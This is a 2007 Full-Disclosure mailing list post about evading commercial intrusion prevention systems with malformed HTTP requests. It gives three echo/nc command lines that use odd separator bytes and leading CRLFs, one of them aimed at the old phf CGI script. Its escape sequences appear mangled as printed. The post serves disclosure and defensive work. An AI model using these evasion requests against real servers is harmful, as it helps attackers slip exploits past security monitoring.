Home / exploits ips-evasion.txt
Posted on 20 June 2007
Summarized from https://strikecenter.bpointsys.com/ Many commercial IPS products fail to decode HTTP requests which use 0x0c, 0x0b, and 0x0d instead of the normal 0x20/0x09 separators. A request in the following format will evade most IPS protocol decoders: $ echo -ne "GETx0c/cgi-bin/phfx0cHTTP/1.0 " | \nnc webserver 80 A request which contains multiple CRLF sequences instead of a valid method is processed by Apache, yet ignored by most IPS engines: $ echo -ne " /buggy.php HTTP/1.0 " | \nnc webserver 80 The first issue was covered more than a year ago, yet most IPS vendors have failed to address it. The second issue is new, as far as I know. You can even combine them: $ echo -ne " x0c/buggy.phpx0bHTTP/1.0 " | \nnc webserver 80 -HD _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
